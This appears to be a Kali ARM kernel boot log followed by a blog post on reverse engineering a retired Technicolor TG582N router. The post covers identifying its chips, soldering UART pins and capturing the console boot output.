## Flattened Device Tree blob at 18000000
   Booting using the fdt blob at 0x18000000
   Using Device Tree in place at 18000000, end 1800bff4

Starting kernel ...

[    0.000000] Booting Linux on physical CPU 0x0
[    0.000000] Linux version 4.19.0-kali1-armmp ([email protected]) (gcc version 8.2.0 (Debian 8.2.0-13)) #1 SMP Debian 4.19.13-1kali1 (2019-01-03)
[    0.000000] CPU: ARMv7 Processor [412fc09a] revision 10 (ARMv7), cr=10c5387d
[    0.000000] CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
[    0.000000] OF: fdt: Machine model: SolidRun Cubox-i Dual/Quad
[    0.000000] Memory policy: Data cache writealloc
[    0.000000] efi: Getting EFI parameters from FDT:
[    0.000000] efi: UEFI not found.
[    0.000000] cma: Reserved 16 MiB at 0x8f000000
[    0.000000] random: get_random_bytes called from start_kernel+0xa0/0x504 with crng_init=0
[    0.000000] percpu: Embedded 17 pages/cpu @(ptrval) s39116 r8192 d22324 u69632
[    0.000000] Built 1 zonelists, mobility grouping on.  Total pages: 522560
[    0.000000] Kernel command line: root=/dev/mmcblk1p1 rootfstype=ext4 video=mxcfb0:dev=hdmi,[email protected],if=RGB24,bpp=32 console=ttymxc0,115200n8 console=tty1 consoleblank=0 rw rootwait
[    0.000000] Dentry cache hash table entries: 131072 (order: 7, 524288 bytes)
[    0.000000] Inode-cache hash table entries: 65536 (order: 6, 262144 bytes)
[    0.000000] Memory: 2025800K/2097152K available (8192K kernel code, 1107K rwdata, 2552K rodata, 2048K init, 306K bss, 54968K reserved, 16384K cma-reserved, 1294336K highmem)
[    0.000000] Virtual kernel memory layout:
[    0.000000]     vector  : 0xffff0000 - 0xffff1000   (   4 kB)
[    0.000000]     fixmap  : 0xffc00000 - 0xfff00000   (3072 kB)
[    0.000000]     vmalloc : 0xf0800000 - 0xff800000   ( 240 MB)
[    0.000000]     lowmem  : 0xc0000000 - 0xf0000000   ( 768 MB)
[    0.000000]     pkmap   : 0xbfe00000 - 0xc0000000   (   2 MB)
[    0.000000]     modules : 0xbf000000 - 0xbfe00000   (  14 MB)
[    0.000000]       .text : 0x(ptrval) - 0x(ptrval)   (9184 kB)
[    0.000000]       .init : 0x(ptrval) - 0x(ptrval)   (2048 kB)
[    0.000000]       .data : 0x(ptrval) - 0x(ptrval)   (1108 kB)
[    0.000000]        .bss : 0x(ptrval) - 0x(ptrval)   ( 307 kB)
[    0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=4, Nodes=1
[    0.000000] ftrace: allocating 32449 entries in 96 pages
[    0.000000] rcu: Hierarchical RCU implementation.
[    0.000000] rcu: 	RCU restricting CPUs from NR_CPUS=8 to nr_cpu_ids=4.
[    0.000000] rcu: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=4
[    0.000000] NR_IRQS: 16, nr_irqs: 16, preallocated irqs: 16
[    0.000000] L2C-310 errata 752271 769419 enabled
[    0.000000] L2C-310 enabling early BRESP for Cortex-A9
[    0.000000] L2C-310 full line of zeros enabled for Cortex-A9
[    0.000000] L2C-310 ID prefetch enabled, offset 16 lines
[    0.000000] L2C-310 dynamic clock gating enabled, standby mode enabled
[    0.000000] L2C-310 cache controller enabled, 16 ways, 1024 kB
[    0.000000] L2C-310: CACHE_ID 0x410000c7, AUX_CTRL 0x76470001
[    0.000000] Switching to timer-based delay loop, resolution 333ns
[    0.000007] sched_clock: 32 bits at 3000kHz, resolution 333ns, wraps every 715827882841ns
[    0.000029] clocksource: mxc_timer1: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 637086815595 ns
[    0.002450] Console: colour dummy device 80x30
[    0.002911] console [tty1] enabled
[    0.002962] Calibrating delay loop (skipped), value calculated using timer frequency.. 6.00 BogoMIPS (lpj=12000)
[    0.002997] pid_max: default: 32768 minimum: 301
[    0.003303] Security Framework initialized
[    0.003354] Yama: disabled by default; enable with sysctl kernel.yama.*
[    0.003456] AppArmor: AppArmor initialized
[    0.003587] Mount-cache hash table entries: 2048 (order: 1, 8192 bytes)
[    0.003621] Mountpoint-cache hash table entries: 2048 (order: 1, 8192 bytes)
[    0.004664] CPU: Testing write buffer coherency: ok
[    0.004713] CPU0: Spectre v2: using BPIALL workaround
[    0.005153] CPU0: thread -1, cpu 0, socket 0, mpidr 80000000
[    0.005959] Setting up static identity map for 0x10300000 - 0x103000a0
[    0.007468] rcu: Hierarchical SRCU implementation.
[    0.011385] EFI services will not be available.
[    0.011904] smp: Bringing up secondary CPUs ...
[    0.012834] CPU1: thread -1, cpu 1, socket 0, mpidr 80000001
[    0.012842] CPU1: Spectre v2: using BPIALL workaround
[    0.013856] CPU2: thread -1, cpu 2, socket 0, mpidr 80000002
[    0.013863] CPU2: Spectre v2: using BPIALL workaround
[    0.014869] CPU3: thread -1, cpu 3, socket 0, mpidr 80000003
[    0.014878] CPU3: Spectre v2: using BPIALL workaround
[    0.015031] smp: Brought up 1 node, 4 CPUs
[    0.015056] SMP: Total of 4 processors activated (24.00 BogoMIPS).
[    0.015074] CPU: All CPU(s) started in SVC mode.
[    0.016528] devtmpfs: initialized
[    0.025641] VFP support v0.3: implementor 41 architecture 3 part 30 variant 9 rev 4
[    0.025992] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns
[    0.026032] futex hash table entries: 1024 (order: 4, 65536 bytes)
[    0.027375] pinctrl core: initialized pinctrl subsystem
[    0.028868] DMI not present or invalid.
[    0.029317] NET: Registered protocol family 16
[    0.033089] DMA: preallocated 256 KiB pool for atomic coherent allocations
[    0.033965] audit: initializing netlink subsys (disabled)
[    0.034242] audit: type=2000 audit(0.032:1): state=initialized audit_enabled=0 res=1
[    0.035939] CPU identified as i.MX6Q, silicon rev 1.2
[    0.056010] No ATAGs?
[    0.056179] hw-breakpoint: found 5 (+1 reserved) breakpoint and 1 watchpoint registers.
[    0.056220] hw-breakpoint: maximum watchpoint size is 4 bytes.
[    0.057982] imx6q-pinctrl 20e0000.iomuxc: initialized IMX pinctrl driver
[    0.058770] Serial: AMBA PL011 UART driver
[    0.081508] mxs-dma 110000.dma-apbh: initialized
[    0.083880] v_usb2: supplied by v_5v0
[    0.084147] vcc_3v3: supplied by v_5v0
[    0.084412] v_usb1: supplied by v_5v0
[    0.087824] vgaarb: loaded
[    0.089174] media: Linux media interface: v0.10
[    0.089232] videodev: Linux video capture interface: v2.00
[    0.089300] pps_core: LinuxPPS API ver. 1 registered
[    0.089322] pps_core: Software ver. 5.3.6 - Copyright 2005-2007 Rodolfo Giometti <[email protected]>
[    0.089361] PTP clock support registered
[    0.091199] clocksource: Switched to clocksource mxc_timer1
[    0.170784] VFS: Disk quotas dquot_6.6.0
[    0.170921] VFS: Dquot-cache hash table entries: 1024 (order 0, 4096 bytes)
[    0.171676] AppArmor: AppArmor Filesystem Enabled
[    0.184673] NET: Registered protocol family 2
[    0.185646] tcp_listen_portaddr_hash hash table entries: 512 (order: 0, 6144 bytes)
[    0.185706] TCP established hash table entries: 8192 (order: 3, 32768 bytes)
[    0.185812] TCP bind hash table entries: 8192 (order: 4, 65536 bytes)
[    0.185981] TCP: Hash tables configured (established 8192 bind 8192)
[    0.186238] UDP hash table entries: 512 (order: 2, 16384 bytes)
[    0.186300] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes)
[    0.186589] NET: Registered protocol family 1
[    0.187128] Unpacking initramfs...
[    1.822024] Freeing initrd memory: 19560K
[    1.822709] hw perfevents: no interrupt-affinity property for /pmu, guessing.
[    1.823063] hw perfevents: enabled with armv7_cortex_a9 PMU driver, 7 counters available
[    1.826095] Initialise system trusted keyrings
[    1.826400] workingset: timestamp_bits=14 max_order=19 bucket_order=5
[    1.833640] zbud: loaded
[    6.621158] Key type asymmetric registered
[    6.621192] Asymmetric key parser 'x509' registered
[    6.621275] bounce: pool size: 64 pages
[    6.621357] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 248)
[    6.621575] io scheduler noop registered
[    6.621597] io scheduler deadline registered
[    6.621849] io scheduler cfq registered (default)
[    6.621871] io scheduler mq-deadline registered
[    6.636572] imx-sdma 20ec000.sdma: firmware: failed to load imx/sdma/sdma-imx6q.bin (-2)
[    6.636604] firmware_class: See https://wiki.debian.org/Firmware for information about missing firmware
[    6.636636] imx-sdma 20ec000.sdma: Direct firmware load for imx/sdma/sdma-imx6q.bin failed with error -2
[    6.641836] imx-pgc-pd imx-pgc-power-domain.0: DMA mask not set
[    6.641921] imx-pgc-pd imx-pgc-power-domain.0: Linked as a consumer to 20dc000.gpc
[    6.641999] imx-pgc-pd imx-pgc-power-domain.1: DMA mask not set
[    6.644727] Serial: 8250/16550 driver, 4 ports, IRQ sharing disabled
[    6.647473] Serial: AMBA driver
[    6.648404] 2020000.serial: ttymxc0 at MMIO 0x2020000 (irq = 26, base_baud = 5000000) is a IMX
[    7.412939] console [ttymxc0] enabled
[    7.417932] 21f0000.serial: ttymxc3 at MMIO 0x21f0000 (irq = 66, base_baud = 5000000) is a IMX
[    7.430698] libphy: Fixed MDIO Bus: probed
[    7.435760] fec 2188000.ethernet: 2188000.ethernet supply phy not found, using dummy regulator
[    7.444505] fec 2188000.ethernet: Linked as a consumer to regulator.0
[    7.454609] pps pps0: new PPS source ptp0
[    7.472545] libphy: fec_enet_mii_bus: probed
[    7.477455] fec 2188000.ethernet eth0: registered PHC device 0
[    7.484318] mousedev: PS/2 mouse device common for all mice
[    7.492641] snvs_rtc 20cc000.snvs:snvs-rtc-lp: rtc core: registered 20cc000.snvs:snvs-rtc-lp as rtc0
[    7.505875] ledtrig-cpu: registered to indicate activity on CPUs
[    7.514034] NET: Registered protocol family 10
[    7.544056] Segment Routing with IPv6
[    7.547877] mip6: Mobile IPv6
[    7.550868] NET: Registered protocol family 17
[    7.555362] mpls_gso: MPLS GSO support
[    7.559621] ThumbEE CPU extension supported.
[    7.563941] Registering SWP/SWPB emulation handler
[    7.569571] registered taskstats version 1
[    7.573724] Loading compiled-in X.509 certificates
[    8.001824] Loaded X.509 cert 'secure-boot-test-key-lfaraone: 97c1b25cddf9873ca78a58f3d73bf727d2cf78ff'
[    8.011399] zswap: loaded using pool lzo/zbud
[    8.016135] AppArmor: AppArmor sha1 policy hashing enabled
[    8.043332] input: gpio-keys as /devices/soc0/gpio-keys/input/input0
[    8.050476] snvs_rtc 20cc000.snvs:snvs-rtc-lp: setting system clock to 1970-01-01 00:00:00 UTC (0)
[    8.059503] sr_init: No PMIC hook to init smartreflex
[    8.065540] brcm_reg: disabling
[    8.068731] v_usb2: disabling
[    8.071738] v_usb1: disabling
[    8.091956] Freeing unused kernel memory: 2048K
[    8.103524] Run /init as init process
[    8.674401] vdd1p1: supplied by regulator-dummy
[    8.683877] vdd3p0: supplied by regulator-dummy
[    8.696602] vdd2p5: supplied by regulator-dummy
[    8.704227] vddarm: supplied by regulator-dummy
[    8.717686] sdhci: Secure Digital Host Controller Interface driver
[    8.718779] i2c i2c-1: IMX I2C adapter registered
[    8.723983] sdhci: Copyright(c) Pierre Ossman
[    8.731604] i2c i2c-1: can't use DMA, using PIO instead.
[    8.742702] sdhci-pltfm: SDHCI platform and OF driver helper
[    8.742793] usbcore: registered new interface driver usbfs
[    8.744626] vddpu: supplied by regulator-dummy
[    8.745481] imx-pgc-pd imx-pgc-power-domain.1: Linked as a consumer to regulator.10
[    8.745595] imx-pgc-pd imx-pgc-power-domain.1: Linked as a consumer to 20dc000.gpc
[    8.745890] vddsoc: supplied by regulator-dummy
[    8.752088] sdhci-esdhc-imx 2190000.usdhc: allocated mmc-pwrseq
[    8.756034] usbcore: registered new interface driver hub
[    8.763812] sdhci-esdhc-imx 2190000.usdhc: Linked as a consumer to regulator.2
[    8.763929] SCSI subsystem initialized
[    8.766600] usbcore: registered new device driver usb
[    8.787503] rtc-pcf8523 2-0068: rtc core: registered rtc-pcf8523 as rtc1
[    8.796044] ahci-imx 2200000.sata: fsl,transmit-level-mV value 1104, using 00000044
[    8.798351] i2c i2c-2: IMX I2C adapter registered
[    8.801051] ahci-imx 2200000.sata: fsl,transmit-boost-mdB value 0, using 00000000
[    8.801481] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[    8.807283] i2c i2c-2: can't use DMA, using PIO instead.
[    8.809805] imx_usb 2184000.usb: Linked as a consumer to regulator.5
[    8.812940] ahci-imx 2200000.sata: fsl,transmit-atten-16ths value 9, using 00002000
[    8.812952] ahci-imx 2200000.sata: fsl,receive-eq-mdB not specified, using 05000000
[    8.868067] ci_hdrc ci_hdrc.0: EHCI Host Controller
[    8.870498] ahci-imx 2200000.sata: SSS flag set, parallel bus scan disabled
[    8.873075] ci_hdrc ci_hdrc.0: new USB bus registered, assigned bus number 1
[    8.880090] ahci-imx 2200000.sata: AHCI 0001.0300 32 slots 1 ports 3 Gbps 0x1 impl platform mode
[    8.896015] ahci-imx 2200000.sata: flags: ncq sntf stag pm led clo only pmp pio slum part ccc apst 
[    8.906799] scsi host0: ahci-imx
[    8.907234] ci_hdrc ci_hdrc.0: USB 2.0 started, EHCI 1.00
[    8.911034] ata1: SATA max UDMA/133 mmio [mem 0x02200000-0x02203fff] port 0x100 irq 69
[    8.915842] usb usb1: New USB device found, idVendor=1d6b, idProduct=0002, bcdDevice= 4.19
[    8.931867] usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[    8.939144] usb usb1: Product: EHCI Host Controller
[    8.944065] usb usb1: Manufacturer: Linux 4.19.0-kali1-armmp ehci_hcd
[    8.950543] usb usb1: SerialNumber: ci_hdrc.0
[    8.955839] hub 1-0:1.0: USB hub found
[    8.959699] hub 1-0:1.0: 1 port detected
[    8.964941] imx_usb 2184200.usb: Linked as a consumer to regulator.4
[    8.975338] ci_hdrc ci_hdrc.1: EHCI Host Controller
[    8.980298] ci_hdrc ci_hdrc.1: new USB bus registered, assigned bus number 2
[    9.003239] ci_hdrc ci_hdrc.1: USB 2.0 started, EHCI 1.00
[    9.008943] usb usb2: New USB device found, idVendor=1d6b, idProduct=0002, bcdDevice= 4.19
[    9.017268] usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1
[    9.024541] usb usb2: Product: EHCI Host Controller
[    9.029458] usb usb2: Manufacturer: Linux 4.19.0-kali1-armmp ehci_hcd
[    9.035939] usb usb2: SerialNumber: ci_hdrc.1
[    9.041101] hub 2-0:1.0: USB hub found
[    9.044948] hub 2-0:1.0: 1 port detected
[    9.107896] mmc0: SDHCI controller on 2190000.usdhc [2190000.usdhc] using ADMA
[    9.117185] sdhci-esdhc-imx 2194000.usdhc: Got CD GPIO
[    9.122559] sdhci-esdhc-imx 2194000.usdhc: Linked as a consumer to regulator.1
[    9.157220] mmc0: queuing unknown CIS tuple 0x80 (50 bytes)
[    9.163693] mmc1: SDHCI controller on 2194000.usdhc [2194000.usdhc] using ADMA
[    9.183174] mmc0: queuing unknown CIS tuple 0x80 (7 bytes)
[    9.191609] mmc0: queuing unknown CIS tuple 0x80 (4 bytes)
[    9.211322] random: fast init done
[    9.224126] mmc1: host does not support reading read-only switch, assuming write-enable
[    9.240939] mmc1: new high speed SDHC card at address aaaa
[    9.245854] ata1: SATA link down (SStatus 0 SControl 300)
[    9.249128] mmc0: queuing unknown CIS tuple 0x02 (1 bytes)
[    9.251988] ahci-imx 2200000.sata: no device found, disabling link.
[    9.258217] mmcblk1: mmc1:aaaa SC16G 14.8 GiB 
[    9.263773] ahci-imx 2200000.sata: pass .hotplug=1 to enable hotplug
[    9.285255] mmc0: new SDIO card at address 0001
[    9.294093]  mmcblk1: p1
[    9.590133] EXT4-fs (mmcblk1p1): mounted filesystem with ordered data mode. Opts: (null)
[   10.331270] systemd[1]: System time before build time, advancing clock.
[   10.410380] systemd[1]: Inserted module 'autofs4'
[   10.477486] systemd[1]: systemd 240 running in system mode. (+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid)
[   10.499686] systemd[1]: Detected architecture arm.
[   10.532504] systemd[1]: Set hostname to <kali>.
[   11.143992] random: systemd: uninitialized urandom read (16 bytes read)
[   11.169989] random: systemd: uninitialized urandom read (16 bytes read)
[   11.177217] systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
[   11.185774] random: systemd: uninitialized urandom read (16 bytes read)
[   11.192813] systemd[1]: Listening on initctl Compatibility Named Pipe.
[   11.205244] systemd[1]: Created slice system-getty.slice.
[   11.212034] systemd[1]: Listening on Journal Audit Socket.
[   11.219580] systemd[1]: Created slice User and Session Slice.
[   11.225807] systemd[1]: Reached target Slices.
[   11.231852] systemd[1]: Set up automount Arbitrary Executable File Formats File System Automount Point.
[   11.644705] systemd-journald[174]: Received request to flush runtime journal from PID 1
[   11.715275] systemd-journald[174]: File /var/log/journal/1669a518f9704310aef53c26dee3d53f/system.journal corrupted or uncleanly shut down, renaming and replacing.
[   13.195395] cpu cpu0: Linked as a consumer to regulator.9
[   13.202118] cpu cpu0: Linked as a consumer to regulator.10
[   13.212353] leds_pwm pwmleds: unable to request PWM for imx6:red:front: -517
[   13.229703] Registered IR keymap rc-empty
[   13.230963] cpu cpu0: Linked as a consumer to regulator.11
[   13.239476] rc rc0: gpio_ir_recv as /devices/soc0/ir-receiver/rc/rc0
[   13.247800] input: gpio_ir_recv as /devices/soc0/ir-receiver/rc/rc0/input1
[   13.291628] rc rc0: lirc_dev: driver gpio_ir_recv registered at minor = 0, raw IR receiver, no transmitter
[   13.292420] leds_pwm pwmleds: unable to request PWM for imx6:red:front: -517
[   13.368979] leds_pwm pwmleds: unable to request PWM for imx6:red:front: -517
[   13.447837] imx2-wdt 20bc000.wdog: timeout 60 sec (nowayout=0)
[   13.466369] etnaviv etnaviv: bound 130000.gpu (ops gpu_ops [etnaviv])
[   13.495507] imx-ipuv3 2400000.ipu: IPUv3H probed
[   13.505100] etnaviv etnaviv: bound 134000.gpu (ops gpu_ops [etnaviv])
[   13.515092] imx-ipuv3 2800000.ipu: IPUv3H probed
[   13.528373] etnaviv etnaviv: bound 2204000.gpu (ops gpu_ops [etnaviv])
[   13.535094] etnaviv-gpu 130000.gpu: model: GC2000, revision: 5108
[   13.591018] etnaviv-gpu 134000.gpu: model: GC320, revision: 5007
[   13.690303] etnaviv-gpu 2204000.gpu: model: GC355, revision: 1215
[   13.696497] etnaviv-gpu 2204000.gpu: Ignoring GPU with VG and FE2.0
[   13.723715] [drm] Initialized etnaviv 1.2.0 20151214 for etnaviv on minor 0
[   13.732615] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[   13.739343] [drm] No driver support for vblank timestamp query.
[   13.750344] imx-drm display-subsystem: bound imx-ipuv3-crtc.2 (ops ipu_crtc_ops [imxdrm])
[   13.758969] imx-drm display-subsystem: bound imx-ipuv3-crtc.3 (ops ipu_crtc_ops [imxdrm])
[   13.794123] imx-drm display-subsystem: bound imx-ipuv3-crtc.6 (ops ipu_crtc_ops [imxdrm])
[   13.824654] imx-drm display-subsystem: bound imx-ipuv3-crtc.7 (ops ipu_crtc_ops [imxdrm])
[   13.887633] imx-spdif sound-spdif: snd-soc-dummy-dai <-> 2004000.spdif mapping ok
[   13.895250] imx-spdif sound-spdif: ASoC: no DMI vendor name!
[   13.910615] dwhdmi-imx 120000.hdmi: Detected HDMI TX controller v1.30a with HDCP (DWC HDMI 3D TX PHY)
[   13.960699] imx-drm display-subsystem: bound 120000.hdmi (ops dw_hdmi_imx_platform_driver_exit [dw_hdmi_imx])
[   13.982623] [drm] Cannot find any crtc or sizes
[   14.009662] [drm] Initialized imx-drm 1.0.0 20120507 for display-subsystem on minor 1
[   14.236656] brcmfmac: brcmf_fw_alloc_request: using brcm/brcmfmac4329-sdio for chip BCM4329/3
[   14.258745] usbcore: registered new interface driver brcmfmac
[   14.323949] brcmfmac mmc0:0001:1: firmware: direct-loading firmware brcm/brcmfmac4329-sdio.bin
[   14.346226] brcmfmac mmc0:0001:1: firmware: direct-loading firmware brcm/brcmfmac4329-sdio.txt
[   14.465318] brcmfmac: brcmf_fw_alloc_request: using brcm/brcmfmac4329-sdio for chip BCM4329/3
[   14.475922] brcmfmac mmc0:0001:1: firmware: failed to load brcm/brcmfmac4329-sdio.clm_blob (-2)
[   14.484716] brcmfmac mmc0:0001:1: Direct firmware load for brcm/brcmfmac4329-sdio.clm_blob failed with error -2
[   14.494898] brcmfmac: brcmf_c_process_clm_blob: no clm_blob available (err=-2), device may have limited channels available
[   14.551518] brcmfmac: brcmf_c_preinit_dcmds: Firmware: BCM4329/3 wl0: Sep  2 2011 14:48:19 version 4.220.48
[   14.594871] brcmfmac: brcmf_setup_wiphybands: rxchain error (-52)
[   14.706815] Bluetooth: Core ver 2.22
[   14.710651] NET: Registered protocol family 31
[   14.715230] Bluetooth: HCI device and connection manager initialized
[   14.722069] Bluetooth: HCI socket layer initialized
[   14.727404] Bluetooth: L2CAP socket layer initialized
[   14.733014] Bluetooth: SCO socket layer initialized
[   14.760303] Bluetooth: Generic Bluetooth SDIO driver ver 0.1
[   15.011475] [drm] Cannot find any crtc or sizes
[   15.050996] random: crng init done
[   15.054429] random: 7 urandom warning(s) missed due to ratelimiting
[   16.793010] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
[   16.887242] rc rc0: two consecutive events of type space
[   16.934160] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
[   16.942551] brcmfmac: _brcmf_set_multicast_list: Setting BRCMF_C_SET_PROMISC failed, -52
[   16.956655] brcmfmac: _brcmf_set_multicast_list: Setting BRCMF_C_SET_PROMISC failed, -52
[   17.551975] Atheros 8035 ethernet 2188000.ethernet-1:00: attached PHY driver [Atheros 8035 ethernet] (mii_bus:phy_addr=2188000.ethernet-1:00, irq=POLL)
[   17.570856] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
[   17.579170] brcmfmac: _brcmf_set_multicast_list: Setting BRCMF_C_SET_PROMISC failed, -52
[   17.835444] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready

Kali GNU/Linux Rolling kali ttymxc0

kali login: 

Thanks to Steev for the late night support and, obviously, Offensive Security.

Reverse engineering the router Technicolor TG582N

7 February 2019 at 09:00
By: Kartone

Over the last few months, my interest in hardware hacking has grown exponentially, because I had the chance to get my hands on some SOHO routers retired by local telcos. What better opportunity to open them up and try to crack them without worrying about irreparable damage?

Inspecting the device

My first device was the Technicolor TG582N distributed in Italy by Fastweb.

Front side
Back side

Nothing particularly interesting on the outside: just the usual information, useless for our purpose, such as the wireless access code, serial number, MAC address, etc.

The inside is much more interesting: I removed the two lower screws hidden under the rubber feet and, with some gentle leverage, unhooked the upper part of the case, which gives access to the router motherboard.

Router motherboard with the relevant ICs

Internal components analysis

This is a pretty standard design for this kind of device: we can clearly see the main CPU, a Broadcom BCM63281KFBG, and its two memory ICs (integrated circuits), RAM and flash memory. There's also another Broadcom chip, but its role is to manage the wireless functionality and, for now, it is out of scope.

Winbond W9751G6KB-25
Spansion FL064PIF

For volatile data, the device uses a DDR2 SDRAM module produced by Winbond with a capacity of 512 Mbit (64 MByte). Obviously I'm interested in the EEPROM chip, because that's where the non-volatile data is stored, persisting across reboots and shutdowns. This device has a flash memory module produced by Spansion (now Cypress) with a capacity of 64 Mbit (8 MByte).
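As a quick sanity check on those figures, the bit-to-byte conversion can be sketched in a few lines of Python. The helper name is hypothetical, and binary prefixes (1 Mbit = 2^20 bits) are assumed, as is usual for memory chips; the capacities are the ones quoted above.

```python
def mbit_to_bytes(mbit):
    """Convert a capacity in Mbit (assumed to mean 2**20 bits) to bytes."""
    return mbit * 1024 * 1024 // 8


# Capacities as quoted in the text for the two memory chips on the board.
chips = {
    "Winbond W9751G6KB-25 (DDR2 SDRAM)": 512,
    "Spansion FL064PIF (flash)": 64,
}

for name, mbit in chips.items():
    size = mbit_to_bytes(mbit)
    print(f"{name}: {mbit} Mbit = {size // 2**20} MiB = 0x{size:x} bytes")
```

The flash works out to 0x800000 bytes, which is the address range a full dump of the chip would have to cover.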

Accessing the UART console

I didn't put too much effort into this because the nice guys of the OpenWRT project did all the dirty work. Although the board perfectly matches the devices described on that page, I noted a slight difference in the EEPROM chip. They mention three board types: DANT-1, DANT-T, and DANT-V. These boards use three types of EEPROM chip, but none of them is this Spansion chip: only the DANT-V version has a Spansion chip, and it's an FL129P, a 128 Mbit flash memory. We're definitely dealing with a smaller memory chip. Anyway, the UART pins are the same as on the other boards: we need to solder 3 pins (Tx, Rx, and GND) and short-circuit R62 and R63, as noted on that page.

Soldered UART pins

After this little soldering job, we can attach a common USB-to-serial interface based on the FTDI FT232 and get console access. Remember NOT to attach the VCC pin, because the board is already powered by its standard supply.
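For readers who would rather script the capture than use a terminal program, here is a minimal Python sketch using only the standard library (Linux/POSIX only). It assumes the adapter shows up as /dev/ttyUSB0 and that the console runs at 115200 baud, 8N1, which is what the minicom banner and the kernel command line in the boot output of this post suggest; both function names are hypothetical.

```python
import os
import termios


def open_console(path="/dev/ttyUSB0", baud=termios.B115200):
    """Open a serial port in raw 8N1 mode (device path and baud are assumptions)."""
    fd = os.open(path, os.O_RDWR | os.O_NOCTTY)
    attrs = termios.tcgetattr(fd)
    # attrs layout: [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
    attrs[0] = 0                                             # no input translation
    attrs[1] = 0                                             # no output processing
    attrs[2] = termios.CS8 | termios.CREAD | termios.CLOCAL  # 8 data bits, no parity
    attrs[3] = 0                                             # no echo, no line editing
    attrs[4] = baud
    attrs[5] = baud
    attrs[6][termios.VMIN] = 1                               # block until 1 byte arrives
    attrs[6][termios.VTIME] = 0
    termios.tcsetattr(fd, termios.TCSANOW, attrs)
    return fd


def iter_lines(chunks):
    """Turn an iterable of raw byte chunks into decoded text lines."""
    buf = b""
    for chunk in chunks:
        buf += chunk
        while b"\n" in buf:
            line, buf = buf.split(b"\n", 1)
            # Boot noise is not always valid text, so replace undecodable bytes.
            yield line.rstrip(b"\r").decode("ascii", errors="replace")
    if buf:
        yield buf.rstrip(b"\r").decode("ascii", errors="replace")


# On real hardware (not executed here):
#   fd = open_console()
#   for line in iter_lines(iter(lambda: os.read(fd, 256), b"")):
#       print(line)
```

Keeping the line splitting separate from the port setup means the same generator can be fed from a saved capture file when the router is not at hand.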


With this simple setup we can finally have access to the router console and see all the boot messages:

Welcome to minicom 2.7.1                                                                                
OPTIONS: I18n                                                                                           
Compiled on May  3 2018, 15:20:11.                                                                      
Port /dev/ttyUSB0, 17:40:25                                                                             
Press CTRL-A Z for help on special keys


D%G                                                                                                     
Decompressing Bootloader..............................                                                  
Gateway initialization sequence started.                                                                
Version BL: 1.0.5
Multicore disable; Booting Linux kernel
BOOTING THE LINUX KERNEL
Starting the kernel @ 0x801dfcd0
Extra parameters passed to Linux:
        [0]: bootloader
        [1]: memsize=0x3EDD000
Linux version 2.6.30 (gcc version 3.4.6) #1 Mon Mar 26 18:25:38 CST 2012
BCM63XX prom init
CPU revision is: 0002a075 (Broadcom4350)
Determined physical RAM map:
 memory: 03edb000 @ 00002000 (usable)
Wasting 64 bytes for tracking 2 unused pages
Zone PFN ranges:
  DMA      0x00000002 -> 0x00001000
  Normal   0x00001000 -> 0x00003edd
Movable zone start PFN for each node
early_node_map[1] active PFN ranges
    0: 0x00000002 -> 0x00003edd
On node 0 totalpages: 16091
free_area_init_node: node 0, pgdat 80238480, node_mem_map 81000040
  DMA zone: 32 pages used for memmap
  DMA zone: 0 pages reserved
  DMA zone: 4062 pages, LIFO batch:0
  Normal zone: 94 pages used for memmap
  Normal zone: 11903 pages, LIFO batch:1
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 15965
Kernel command line: root=31:0 ro noinitrd memsize=0x3EDD000 console=ttyS0,115200 root=/dev/mtdblock2 rootfstype=squashfs
wait instruction: enabled
Primary instruction cache 32kB, VIPT, 4-way, linesize 16 bytes.
Primary data cache 32kB, 2-way, VIPT, cache aliases, linesize 16 bytes
NR_IRQS:128
PID hash table entries: 256 (order: 8, 1024 bytes)
console [ttyS0] enabled
Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
Memory: 61152k/64364k available (1882k kernel code, 3192k reserved, 331k data, 108k init, 0k highmem)
Calibrating delay loop... 318.46 BogoMIPS (lpj=159232)
Mount-cache hash table entries: 512
--Kernel Config--
  SMP=0
  PREEMPT=0
  DEBUG_SPINLOCK=0
  DEBUG_MUTEXES=0
net_namespace: 584 bytes
NET: Registered protocol family 16
registering PCI controller with io_map_base unset
registering PCI controller with io_map_base unset
bio: create slab <bio-0> at 0
usbcore: registered new interface driver usbfs
usbcore: registered new interface driver hub
usbcore: registered new device driver usb
pci 0000:00:09.0: reg 10 32bit mmio: [0x10002600-0x100026ff]
pci 0000:00:0a.0: reg 10 32bit mmio: [0x10002500-0x100025ff]
pci 0000:01:00.0: PME# supported from D0 D3hot
pci 0000:01:00.0: PME# disabled
pci 0000:02:00.0: reg 10 64bit mmio: [0x000000-0x003fff]
pci 0000:02:00.0: supports D1 D2
pci 0000:01:00.0: PCI bridge, secondary bus 0000:02
pci 0000:01:00.0:   IO window: disabled
pci 0000:01:00.0:   MEM window: 0x10f00000-0x10ffffff
pci 0000:01:00.0:   PREFETCH window: disabled
PCI: Enabling device 0000:01:00.0 (0000 -> 0002)
PCI: Setting latency timer of device 0000:01:00.0 to 64
BLOG Rule v1.0 Initialized
Broadcom IQoS v0.1 Mar 26 2012 18:23:40 initialized
NET: Registered protocol family 2
IP route cache hash table entries: 1024 (order: 0, 4096 bytes)
